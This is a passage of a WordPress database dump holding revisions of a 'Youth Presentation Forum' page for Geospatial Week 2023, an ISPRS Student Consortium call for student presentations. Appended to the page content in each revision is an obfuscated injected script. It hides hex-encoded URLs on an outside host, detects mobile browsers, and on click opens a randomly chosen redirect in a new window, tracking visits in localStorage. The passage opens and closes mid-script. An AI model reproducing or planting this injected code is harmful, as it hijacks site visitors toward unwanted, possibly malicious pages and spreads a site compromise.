)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:59:05','2023-01-22 04:59:05','',3613,'https://gsw2023.com/?p=3629',0,'revision','',0),
(3630,1,'2023-01-22 04:59:16','2023-01-22 04:59:16','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of the event:</strong></h5>\n<p>We welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:<br />\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.<br />\n⦁ Applications of Machine Learning in Geospatial Technologies.<br />\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.<br />\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.<br />\n⦁ GIS Education and Outreach Activities.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter:</strong></h5>\n<p>We accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:59:16','2023-01-22 04:59:16','',3613,'https://gsw2023.com/?p=3630',0,'revision','',0),
(3631,1,'2023-01-22 05:01:50','2023-01-22 05:01:50','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of the event:</strong></h5>\n<p>We welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:<br />\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.<br />\n⦁ Applications of Machine Learning in Geospatial Technologies.<br />\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.<br />\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.<br />\n⦁ GIS Education and Outreach Activities.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter:</strong></h5>\n<p>We accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 